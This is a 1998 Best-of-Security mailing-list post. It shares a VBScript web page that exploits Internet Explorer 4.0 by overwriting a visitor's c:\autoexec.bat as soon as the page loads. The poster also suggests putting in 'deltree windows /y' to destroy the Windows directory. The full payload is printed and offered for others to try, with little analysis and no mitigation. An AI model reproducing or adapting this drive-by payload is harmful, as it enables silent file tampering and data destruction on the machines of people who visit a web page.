[603] in Best-of-Security
BoS: Another Micro$oft slut!
daemon@ATHENA.MIT.EDU (Pink Panther)
Sat Mar 14 02:44:06 1998
XDelivering-To: best-of-security@cyber.com.au
Delivering-To: best-of-security@cyber.com.au
Date: Thu, 12 Feb 1998 16:23:52 -0500
From: Pink Panther <franckp@hebdomag.com>
Old-X-Originally-To: To: firewalls@GreatCircle.COM
Old-X-Originated-From: From: Pink Panther <franckp@hebdomag.com>
Errors-To: best-of-security-request@cyber.com.au
To: best-of-security@cyber.com.au
Resent-From: best-of-security@cyber.com.au
Hi all,
Sorry to be out of topic but...
For those who are using Internet Explorer 4.0 YACK!
If you put that little script in a web page, you can modify all the files
you want and make a big crash!
This script works with VBScript 3.x engines...
<HTML>
<HEAD>
</HEAD>
<BODY>
<SCRIPT LANGUAGE="VBSCRIPT">
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("c:\autoexec.bat", True)
a.WriteLine("@echo off")
a.WriteLine("echo This is a test.")
a.WriteLine("pause")
a.WriteLine("@echo on")
a.Close
</SCRIPT>
</BODY>
</HTML>
Good Bye!
</BODY>
</HTML>
This will replace the autoexec.bat of the client with the content of
"a.writeLine"...
Imagine with "deltree windows /y"
If you plan to try this script, BACKUP YOUR AUTOEXEC.BAT!!!
That's ALLLLLLLLLLLLLLLLLLLLL!
/***Pink Panther The Big pink minou!***/